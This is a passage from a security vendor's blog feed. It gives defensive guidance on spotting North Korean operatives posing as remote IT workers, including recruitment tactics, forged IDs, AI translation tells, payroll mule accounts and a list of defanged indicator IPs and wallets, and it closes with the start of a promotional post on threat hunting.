<li><strong>Legitimate Cover:</strong> By maintaining a facade of productivity, operatives generate legitimate salaries while gathering intelligence and staging future cyberattacks.</li>
</ul>



<h2 class="wp-block-heading">Actionable Steps for SOCs to Detect North Korea Remote IT Workers Infiltration Early</h2>



<p class="wp-block-paragraph">Standard background checks, especially automated ones, are insufficient to ensure DPRK IT worker detection.</p>



<p class="wp-block-paragraph">Defending against this requires SOC and recruitment teams to adopt a technical vetting model that treats hiring as an attack vector.</p>



<h2 class="wp-block-heading">Spot Mass Outreach and GitHub Exploitation Tactics</h2>



<p class="wp-block-paragraph">The initial stage of the North Korean scheme often begins with wide-scale recruitment efforts targeting developers on platforms like Telegram and GitHub.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="963" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelos-comment-963x1024.png" alt="Angelo’s comment on GitHub looking for facilitators" class="wp-image-22552" style="aspect-ratio:0.9404355812122802;width:680px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelos-comment-963x1024.png 963w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelos-comment-282x300.png 282w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelos-comment-768x816.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelos-comment-1445x1536.png 1445w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelos-comment-370x393.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelos-comment-270x287.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelos-comment-740x786.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelos-comment.png 1592w" sizes="auto, (max-width: 963px) 100vw, 963px" /><figcaption class="wp-element-caption"><em>A North Korean operative looking for facilitators on GitHub</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">A highly specific tactic involves recruiters spamming GitHub repositories with fraudulent job offers. These messages are often delivered as <strong>pull requests directly on a developer’s own repositories</strong>, making them difficult to ignore.</p>



<p class="wp-block-paragraph">Recruiters seek individuals who appear to have experience working with US companies, offering them &#8220;partnerships&#8221; where they can increase their income by attending interviews on behalf of the operative.</p>



<h2 class="wp-block-heading">Eliminate Rogue Team Leads from the Hiring Process</h2>



<p class="wp-block-paragraph">Famous Chollima operations often rely on a key team lead (a &#8220;horse trader&#8221; or agency manager) who acts as the primary point of contact to build trust and scale their footprint inside targeted organizations:</p>



<ul class="wp-block-list">
<li><strong>Beware of &#8220;Bring Your Own Team&#8221; Offers:</strong> A single lead will apply for or land a role, establish rapport with hiring managers, and then offer to recruit, manage, or refer additional developers. Under the guise of a turnkey contracting team, this facilitator brings in multiple North Korean operatives using fake or stolen identities.</li>



<li><strong>Enforce Direct, Individual Vetting:</strong> Never permit a single contractor, agency manager, or team lead to bypass individual KYC/background checks for their referred developers. Every individual applicant must undergo separate, direct identity verification and technical assessment.</li>
</ul>



<h2 class="wp-block-heading">Safely Triage Applicant Files and Links with a Sandbox</h2>



<p class="wp-block-paragraph">Your Security Operations Center (SOC) must actively participate in the vetting process by validating suspicious candidate deliverables before finalizing a hire.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="636" src="/cybersecurity-blog/wp-content/uploads/2025/01/5-1024x636.jpg" alt="" class="wp-image-11084" style="aspect-ratio:1.6101563709552562;width:754px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/01/5-1024x636.jpg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/01/5-300x186.jpg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/01/5-768x477.jpg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/01/5-370x230.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/01/5-270x168.jpg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/01/5-740x459.jpg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/01/5.jpg 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>DPRK-linked malware detected and analyzed inside ANY.RUN&#8217;s Interactive Sandbox</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Applicants routinely submit portfolios, code archives, or external links during technical assessments. Opening these directly on internal corporate workstations exposes the network to staging malware (such as <em><a href="https://any.run/cybersecurity-blog/ottercookie-malware-analysis/" target="_blank" rel="noreferrer noopener">OtterCookie</a></em>, <em><a href="https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/" target="_blank" rel="noreferrer noopener">InvisibleFerret</a></em>, and <a href="https://any.run/cybersecurity-blog/pylangghost-malware-analysis/" target="_blank" rel="noreferrer noopener">PyLangGhost RAT</a>).</p>



<p class="wp-block-paragraph">Integrating ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a> into the technical vetting and SOC triage and response workflows provides critical security value and operational efficiency:</p>



<ul class="wp-block-list">
<li><strong>Uncover Evasive Phishing &amp; Malware in under 60 seconds</strong>: Automated tools often miss stealthy malware that requires human interaction. ANY.RUN allows analysts to actively interact with the candidate&#8217;s files and URLs in real time, clicking links and triggering behaviors that reveal hidden payloads.</li>



<li><strong>Ensure Early-Stage Attack Vector Neutralization</strong>: Proactive analysis of suspicious objects sent by candidates enables SOC teams to identify malicious intent early and prevent threat actors from ever obtaining legitimate corporate credentials, company laptops, or access to sensitive infrastructure.</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Close malware &#038; phishing visibility gaps in your SOC.</span><br>
Detect threats in <60 sec and cut MTTR by 21 min per case.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&#038;utm_term=200826&amp;utm_content=linktoenterpriseform/#contact-sales" rel="noopener" target="_blank">
Integrate ANY.RUN</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Inspect Applicant Documents for AI Artifacts and Forensic Inconsistencies</h2>



<p class="wp-block-paragraph">North Korean operatives frequently submit manipulated identity documents containing digital creation fingerprints.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="645" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-Angelos-ID-2-1024x645.png" alt="Lazarus Angelo's driving license" class="wp-image-22556" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-Angelos-ID-2-1024x645.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-Angelos-ID-2-300x189.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-Angelos-ID-2-768x484.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-Angelos-ID-2-1536x968.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-Angelos-ID-2-370x233.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-Angelos-ID-2-270x170.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-Angelos-ID-2-740x466.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-Angelos-ID-2.png 1698w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>A fake ID card provided by one of the operatives </em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Investigations show forged licenses often contain metadata proving processing via AI tools like Google Gemini, or feature embedded SynthID watermarks.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="543" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelo-License-Metadata-1024x543.png" alt="Lazarus investigation: Angelo’s License Metadata" class="wp-image-22557" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelo-License-Metadata-1024x543.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelo-License-Metadata-300x159.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelo-License-Metadata-768x408.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelo-License-Metadata-1536x815.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelo-License-Metadata-2048x1087.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelo-License-Metadata-370x196.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelo-License-Metadata-270x143.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Angelo-License-Metadata-740x393.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The ID card&#8217;s metadata</em> <em>showing it was generated by AI</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">Analyze candidate data for geographic discrepancies (e.g., <a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation-part-two/">claiming residence in Texas while presenting a California driver&#8217;s license and a New York bank account</a>). Forensic analysis often reveals stolen authentic photos re-used across multiple applications.</p>



<h2 class="wp-block-heading">Monitor for AI-Assisted and Suspicious Live Behavior</h2>



<p class="wp-block-paragraph">Apart from North Korean IT worker AI-generated personas, operatives rely heavily on live translation and dynamic AI prompt generators.</p>



<figure class="wp-block-embed aligncenter is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="Cough syrup" width="770" height="433" src="https://www.youtube.com/embed/hjpQBRR7lQ4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div><figcaption class="wp-element-caption"><em>A video of a DPRK operative faking a cough after his AI live translation tool</em>&#8216;s<em> malfunction during a call</em></figcaption></figure>



<p class="wp-block-paragraph"><a href="https://youtu.be/hjpQBRR7lQ4" target="_blank" rel="noreferrer noopener"><strong>Watch the video on YouTube</strong></a> and <a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation-part-two/" target="_blank" rel="noreferrer noopener"><strong>read the full investigation</strong></a></p>



<p class="wp-block-paragraph">Watch for off-screen glances, unusual delays before answering technical queries, or physical distractions. In recorded instances, operatives faked medical emergencies or prolonged coughing fits to avoid speaking when translation tools failed.</p>



<h2 class="wp-block-heading">Trace Mule Accounts and Cryptocurrency Infrastructure</h2>



<p class="wp-block-paragraph">Salary exfiltration relies on complex networks of mule accounts, payment intermediaries, and digital wallets designed to route funds back to the DPRK.</p>



<p class="wp-block-paragraph">Always verify that the account holder&#8217;s name on banking or crypto payment details matches the verified candidate&#8217;s identity. <strong>Operatives frequently request payroll transfers to third-party accounts</strong>, domestic facilitators, or mule accounts tied to stolen Social Security Numbers (SSNs) and completely different names.</p>



<p class="wp-block-paragraph">To bypass traditional banking compliance and international sanctions, operatives push to receive compensation or transfer funds through non-custodial wallets or exchange wallets on platforms.</p>



<h2 class="wp-block-heading">Analyze Network Markers: Proxies, VPNs, and Jump Boxes</h2>



<p class="wp-block-paragraph">To maintain the illusion of being local U.S. residents, North Korean IT worker tactics involve multi-layered networking designed to hide their origin.</p>



<p class="wp-block-paragraph">During <a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation-part-two/" target="_blank" rel="noreferrer noopener"><strong>the BCA LTD, NorthScan, and ANY.RUN investigation</strong></a>, researchers successfully exposed operatives&#8217; true locations by asking candidates to scan a QR code during a live interview to access a coding test. Embedded Canary Tokens silently recorded the candidates&#8217; actual IP addresses, User-Agents, and geolocation data, completely bypassing active VPNs like AstrillVPN.</p>



<p class="wp-block-paragraph">SOC and recruiting teams should closely monitor candidate connectivity and verify real network locations wherever possible:</p>



<ul class="wp-block-list">
<li><strong>Track network telemetry, User-Agent strings, and IP locations</strong> during video calls, technical assignments, or onboarding tasks to flag proxies and VPN exit nodes.</li>



<li><strong>Enforce strict policies against commercial VPN services</strong> (e.g., AstrillVPN) commonly used by Famous Chollima operatives to spoof major U.S. exit nodes.</li>
</ul>



<h2 class="wp-block-heading">DPRK IT Worker IOCs</h2>



<ul class="wp-block-list">
<li>IPv4: 89[.]187[.]185[.]11 // DPRK-operated VPS</li>



<li>IPv4: 45[.]77[.]71[.]42 // DPRK-operated VPS</li>



<li>IPv4: 185[.]152[.]67[.]39 // DPRK-operated VPS</li>



<li>IPv4: 104[.]250[.]148[.]58 // AstrillVPN exit node</li>



<li>IPv4: 192[.]200[.]115[.]226 // AstrillVPN exit node</li>



<li>IPv4: 107[.]150[.]38[.]250 // AstrillVPN exit node</li>



<li>IPv4: 206[.]217[.]134[.]34 // AstrillVPN exit node</li>



<li>IPv4:199[.]168[.]112[.]175 // AstrillVPN exit node</li>



<li>0x8953B9661339a48f4E6408aA1B359CD49F3A6CAd</li>



<li>0xA3D6938f152C47A411263573Bb3AF324C25A8eba</li>



<li>0xB26A7C7EA6D75956EbD8c5D294524903b1cf13D0</li>
</ul>



<h2 class="wp-block-heading">Keep Defenses Updated with Fresh Threat Intelligence </h2>



<p class="wp-block-paragraph">While North Korean IT worker schemes primarily rely on identity fraud and social engineering, their operations heavily overlap with broader state-sponsored campaigns run by North Korean APT groups (such as Lazarus / Famous Chollima). </p>



<p class="wp-block-paragraph">Threat actors routinely reuse command-and-control (C2) infrastructure, staging servers, malware delivery domains, and phishing URLs across both cyber espionage and remote worker infiltration schemes.</p>



<p class="wp-block-paragraph">SOC analysts can collect context on indicators from alerts like URLs, file hashes, mutexes, or proactively gather actionable intel on active threats using ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Lookup</strong></a>. </p>



<p class="wp-block-paragraph">Powered by real-time telemetry contributed by <strong>over 16,000 organizations and 700,000 security professionals worldwide</strong>, TI Lookup instantly cross-references indicators against known Lazarus/Famous Chollima malware samples (such as BeaverTail or InvisibleFerret), phishing infrastructure, and active C2 servers.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/lazrus_ti_lookup_screen-1024x578.png" alt="" class="wp-image-22753" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/lazrus_ti_lookup_screen-1024x578.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/lazrus_ti_lookup_screen-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/lazrus_ti_lookup_screen-768x433.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/lazrus_ti_lookup_screen-1536x866.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/lazrus_ti_lookup_screen-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/lazrus_ti_lookup_screen-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/lazrus_ti_lookup_screen-740x417.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/lazrus_ti_lookup_screen.png 1833w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup provides the latest IOCs and other threat intel on Lazarus APT attacks</em></figcaption></figure>



<p class="wp-block-paragraph">For example, running a query like <a href="https://intelligence.any.run/analysis/lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktotilookup#{%22query%22:%22threatName:%5C%22lazarus%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">threatName:&#8221;lazarus&#8221;</a> reveals numerous indicators belonging to the latest malware campaigns run by Lazarus like TigerRAT and others. SOC teams can use these indicators to enrich their defense systems to identify attacks early and prevent an incident.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="468" src="/cybersecurity-blog/wp-content/uploads/2026/02/monitoring_feeds1-1024x468.png" alt="" class="wp-image-18792" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/02/monitoring_feeds1-1024x468.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/02/monitoring_feeds1-300x137.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/02/monitoring_feeds1-768x351.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/02/monitoring_feeds1-370x169.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/02/monitoring_feeds1-270x123.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/02/monitoring_feeds1-740x338.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/02/monitoring_feeds1.png 1465w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Threat Intelligence Feeds: data, features, integrations</em> </figcaption></figure>



<p class="wp-block-paragraph">Security teams can also ingest continuously updated <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Feeds</strong></a> directly into their SIEM, EDR, and perimeter firewalls. By feeding real-time network indicators (IPs, domains, URLs) gathered from global investigations directly into your security stack, your SOC can automatically block malicious connections and prevent unauthorized data exfiltration.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Enrich your SOC&#8217;s triage, response, and hunting with actionable threat context. 
 </span><br>Shorten investigations to stops threats before they become incidents. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/plans-ti/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&#038;utm_term=200826&amp;utm_content=linktotiplansform#contact-sales" target="_blank" rel="noopener">
Integrate ANY.RUN&#8217;s Threat Intelligence
</a>
<!-- CTA Link -->
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
.regular-banner__link:hover {
background-color: #FFFFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">The North Korean IT worker scheme represents a unique hybrid threat, combining traditional human infiltration, social engineering, identity fraud, and software supply chain risk. Defensive strategies that focus strictly on traditional malware detection are insufficient when an attacker holds valid credentials, corporate devices, and a legitimate seat on your engineering team.</p>



<p class="wp-block-paragraph">Protecting your organization requires aligning HR, recruiting, and SOC workflows. By enforcing strict identity verification, monitoring candidate connection telemetry, running interactive file/link sandboxing during technical assessments, and feeding real-time Threat Intelligence into your security stack, companies and government agencies can stop Famous Chollima operatives before they gain a permanent foothold.</p>



<h2 class="wp-block-heading">About ANY.RUN</h2>



<p class="wp-block-paragraph"><strong><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a></strong> is a leading provider of interactive malware analysis and threat intelligence solutions, trusted by more than 16,000 organizations and over 700,000 security professionals worldwide.</p>



<p class="wp-block-paragraph">Its <strong><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a></strong> enables SOC teams, MSSPs, and threat researchers to analyze malware, suspicious files, URLs, and candidate deliverables in controlled, live virtual environments. By offering full behavioral visibility in under 60 seconds, ANY.RUN helps analysts observe execution chains, capture network traffic, and make fast, confident response decisions.</p>



<p class="wp-block-paragraph">Additionally, <strong><a href="https://intelligence.any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktotiservice" target="_blank" rel="noreferrer noopener">ANY.RUN Threat Intelligence</a></strong> aggregates real-time indicators from global investigations. This allows security teams to enrich local SIEM/EDR alerts, uncover shared adversary infrastructure, and stay ahead of evolving APT tactics, phishing campaigns, and insider threat schemes.</p>



<h2 class="wp-block-heading">Frequently Asked Questions (FAQ)</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1787177239111"><strong class="schema-faq-question"><strong>1. Why are North Korean IT workers targeting government agencies and corporate SOCs?</strong></strong> <p class="schema-faq-answer">Beyond earning revenue for the DPRK, placing operatives inside corporate or public sector organizations grants long-term, persistent access to source code, intellectual property, and internal networks. Operatives can gather intelligence, manipulate software supply chains, and stage future cyberattacks without ever needing to exploit software vulnerabilities.</p> </div> <div class="schema-faq-section" id="faq-question-1787177254143"><strong class="schema-faq-question"><strong>2. How do operatives bypass standard background checks and automated HR screening?</strong></strong> <p class="schema-faq-answer">Operatives rely on stolen identities, rented Social Security Numbers (SSNs), synthetic personas created with AI tools like Google Gemini, and domestic facilitators who host &#8220;laptop farms&#8221;. Standard background checks confirm that the identity itself exists, but they often fail to verify whether the remote candidate behind the screen is actually the person named in the documents.</p> </div> <div class="schema-faq-section" id="faq-question-1787177263630"><strong class="schema-faq-question"><strong>3. What is a &#8220;laptop farm&#8221; and how does it obscure the operative&#8217;s location?</strong></strong> <p class="schema-faq-answer">A laptop farm is a physical setup managed by a domestic facilitator (often based in the U.S. or EU). Corporate equipment sent by the employer is delivered to the facilitator&#8217;s address. The facilitator connects the devices to local residential internet and grants the North Korean operative 24/7 remote desktop access (via AnyDesk, Google Remote Desktop, etc.). This makes all network connections appear to originate from a legitimate local residence.</p> </div> <div class="schema-faq-section" id="faq-question-1787177275158"><strong class="schema-faq-question"><strong>4. How can a SOC safely inspect coding assignments, portfolios, or links sent by candidates?</strong></strong> <p class="schema-faq-answer">Candidate deliverables should never be opened directly on corporate endpoints. Using an interactive environment like <strong><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN Interactive Sandbox</a></strong>, SOC teams can open suspicious files, scripts, or URLs in a secure cloud container. Analysts can interactively test the submission, observe process trees, and monitor outbound network connections in real time without risking the internal network.</p> </div> <div class="schema-faq-section" id="faq-question-1787177378540"><strong class="schema-faq-question">5. <strong>How does Threat Intelligence help detect North Korean operative schemes?</strong></strong> <p class="schema-faq-answer">North Korean remote worker schemes heavily share infrastructure with state-sponsored APT groups like Lazarus (Famous Chollima). Operatives routinely reuse C2 servers, malware delivery domains, phishing links, and malicious code samples (such as <em>BeaverTail</em> or <em>InvisibleFerret</em>). Cross-referencing candidate links, domains, or infrastructure against <strong><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">ANY.RUN Threat Intelligence Lookup</a></strong> and <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-to-identify-remote-workers&amp;utm_term=200826&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Feeds</strong></a> allows SOC analysts to instantly spot overlaps with known DPRK cyber campaigns and block threats at the perimeter.</p> </div> </div>
<p>The post <a href="https://any.run/cybersecurity-blog/how-to-protect-organization-against-north-korean-it-workers/">North Korean IT Workers Scheme: Detection IOCs and Tactics for Government and Corporate SOCs</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/how-to-protect-organization-against-north-korean-it-workers/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hunt Malware &amp; Phishing Threats with ANY.RUN for Proactive Enterprise Security</title>
		<link>https://any.run/cybersecurity-blog/proactive-threat-hunting/</link>
					<comments>https://any.run/cybersecurity-blog/proactive-threat-hunting/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 19 Aug 2026 10:27:03 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22695</guid>

					<description><![CDATA[<p>One of the biggest challenges for every threat hunter is navigating endless alerts, scattered indicators, behavioral evidence, and infrastructural context. Data collection is just the first step – but how do you turn it into findings that lead to proactive protection against malware and phishing? ANY.RUN Threat Intelligence has the answer. Threat Intelligence: Thinking Ahead [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/proactive-threat-hunting/">Hunt Malware &amp; Phishing Threats with ANY.RUN for Proactive Enterprise Security</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">One of the biggest challenges for every threat hunter is navigating endless alerts, scattered indicators, behavioral evidence, and infrastructural context. Data collection is just the first step – but how do you turn it into findings that lead to proactive protection against malware and phishing? </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ANY.RUN Threat Intelligence</a> has the answer. </p>



<h2 class="wp-block-heading">Threat Intelligence: Thinking Ahead </h2>



<p class="wp-block-paragraph">It doesn’t take much to start a threat hunt. One suspicious indicator or an artifact – and the investigation is launched. But moving from the initial lead to realizing how it can be used to support malware &amp; phishing defenses is often a long journey. <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> changes that. </p>



<p class="wp-block-paragraph">It&#8217;s designed to shorten the path from a suspicious signal to validated findings, ready to be used for proactive security: from testing a hunting hypothesis and uncovering related infrastructure to expanding detection coverage. </p>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> gives threat hunters access to intelligence grounded in real-world threat data from investigations by 16,000+ SOC teams within a single environment, allowing you to: </p>



<ul class="wp-block-list">
<li>search for known observables </li>
</ul>



<ul class="wp-block-list">
<li>investigate related technical context </li>
</ul>



<ul class="wp-block-list">
<li>examine malicious behavior and infrastructure </li>
</ul>



<ul class="wp-block-list">
<li>narrow the results to the evidence relevant to your hunt </li>
</ul>



<p class="wp-block-paragraph">Doing this manually across disconnected sources would stretch every step of the investigation, making it easier to miss useful relationships. One day, this might mean missing a critical risk. </p>



<p class="wp-block-paragraph">To prevent that, <a href="https://any.run/plans-ti/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=proactive-threat-hunting&amp;utm_term=190826&amp;utm_content=linktotiplans" target="_blank" rel="noreferrer noopener">ANY.RUN Threat Intelligence</a> helps security teams: </p>



<ul class="wp-block-list">
<li><strong>Investigate threats faster: </strong>Move from an initial indicator to relevant context without spending as much time manually correlating fragmented data. </li>
</ul>



<ul class="wp-block-list">
